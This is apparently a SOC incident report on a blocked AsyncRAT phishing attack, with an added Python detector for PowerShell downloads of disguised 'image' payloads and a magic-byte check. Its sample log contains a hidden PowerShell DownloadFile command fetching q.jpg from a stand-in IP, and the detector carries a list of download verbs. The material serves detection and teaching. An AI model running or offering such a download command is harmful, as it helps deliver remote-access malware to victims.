
Async Attack Observed in Obfuscated Email Attachment

In March, the Cerium SOC team detected and prevented a multi-stage AsyncRAT infection. The attack originated from a malicious PDF file attached to an email from “no-reply@ctn-slngs[.]com”. The victim clicked a link embedded in the PDF, which triggered a PowerShell script. The script reached out to “hxxp://45[.]154[.]98[.]24:222/q[.]jpg”, a self-extracting compressed archive disguised as a picture.


After extensive investigation into the source and forensic analysis of the malicious attachment, the SOC determined that the URL and binary are associated with AsyncRAT, a Remote Access Trojan (RAT) that uses encrypted connections to remotely control and monitor computers. Alongside these capabilities, it also incorporates features such as keylogging and remote desktop control, posing a serious risk to the victim’s system. Delivery methods for this RAT include spear phishing, malvertising, and exploit kits.

The attacker obfuscated the malicious link and loader in a way that bypassed the client’s email security. Thankfully, the client’s endpoint security stopped the PowerShell script from downloading the AsyncRAT payload and alerted the SIEM. In under an hour, Cerium SOC responded to the alert, analyzed the email and attachment for additional threat intelligence, and escalated the incident to the client.
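The two detection opportunities in this chain are the PowerShell download itself (a raw IP address, a non-standard port, and an image extension fetched from a command line) and the fact that the “picture” is really an executable archive. The following is an added example written for this post, not Cerium’s tooling or the client’s SIEM content: it scans constructed process-creation log lines for that download pattern and checks a fetched body’s magic bytes against the extension the URL claims. The helper names, the sample log lines and the 192.0.2.10 address are all assumptions chosen for illustration (192.0.2.0/24 is a reserved documentation range, not the real indicator above).

```python
import re
from dataclasses import dataclass
from typing import List

# Hypothetical helper names; this is an added example, not the SOC's own detection content.

# Leading bytes of formats a "picture" URL may actually carry.
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"MZ": "pe-executable",        # Windows EXE, which includes self-extracting archives
    b"PK\x03\x04": "zip",
    b"Rar!\x1a\x07": "rar",
    b"7z\xbc\xaf\x27\x1c": "7z",
}
CONTAINER_KINDS = {"pe-executable", "zip", "rar", "7z"}
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}

URL_RE = re.compile(
    r"https?://(?P<host>[^/:\s'\"]+)(?::(?P<port>\d+))?(?P<path>/[^\s'\"]*)?", re.I
)
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
# Common PowerShell download verbs seen in command lines.
DOWNLOAD_VERBS = ("downloadfile", "downloadstring", "invoke-webrequest",
                  "iwr ", "invoke-restmethod", "start-bitstransfer")


def identify_payload(data: bytes) -> str:
    """Classify a fetched body by its magic bytes, ignoring the file name."""
    for sig, name in MAGIC.items():
        if data.startswith(sig):
            return name
    return "unknown"


def _url_extension(url: str) -> str:
    m = URL_RE.match(url)
    path = (m.group("path") if m else url) or ""
    name = path.split("?", 1)[0].rsplit("/", 1)[-1]
    return ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""


def extension_mismatch(url: str, data: bytes) -> bool:
    """True when the URL claims an image but the bytes are an executable or archive."""
    return _url_extension(url) in IMAGE_EXT and identify_payload(data) in CONTAINER_KINDS


@dataclass
class Finding:
    line_no: int
    reason: str
    url: str


def scan_process_log(lines) -> List[Finding]:
    """Flag PowerShell command lines that pull a 'picture' from a raw IP or odd port."""
    findings = []
    for i, line in enumerate(lines, 1):
        low = line.lower()
        if "powershell" not in low or not any(v in low for v in DOWNLOAD_VERBS):
            continue
        for m in URL_RE.finditer(line):
            host, port = m.group("host"), m.group("port")
            reasons = []
            if IPV4_RE.match(host):
                reasons.append("raw-ip host")
            if port and port not in ("80", "443"):
                reasons.append(f"non-standard port {port}")
            if _url_extension(m.group(0)) in IMAGE_EXT:
                reasons.append("image extension fetched by PowerShell")
            if reasons:
                findings.append(Finding(i, "; ".join(reasons), m.group(0)))
    return findings


# Constructed sample log lines (process name + command line), not real telemetry.
SAMPLE_LOG = [
    r"C:\Windows\System32\notepad.exe report.txt",
    "powershell.exe -w hidden -c (New-Object Net.WebClient)"
    ".DownloadFile('http://192.0.2.10:222/q.jpg','C:\\Users\\u\\AppData\\Local\\Temp\\q.jpg')",
    "powershell.exe -c Invoke-WebRequest https://updates.example.com/agent.msi -OutFile C:\\Temp\\agent.msi",
]

# Constructed bodies: a real JPEG header versus a PE header served under a .jpg name.
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
FAKE_JPEG = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff"


def demo() -> List[Finding]:
    return scan_process_log(SAMPLE_LOG)


if __name__ == "__main__":
    for f in demo():
        print(f"line {f.line_no}: {f.reason} -> {f.url}")
    print("q.jpg is really:", identify_payload(FAKE_JPEG))
```

Only the second line fires, with all three reasons, while the legitimate installer download on the third line stays quiet. The magic-byte check is the complement for a proxy or sandbox that sees the body: a `.jpg` that begins with `MZ` or `PK` should be treated as a dropped executable regardless of its name or Content-Type.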

The client quickly isolated the user and device and removed the malicious email from the rest of the mail server. They also blacklisted the attacker’s sender address and the payload address. Further investigation concluded that the SOC team stopped the attack before infection occurred, and no client data was compromised in the incident.
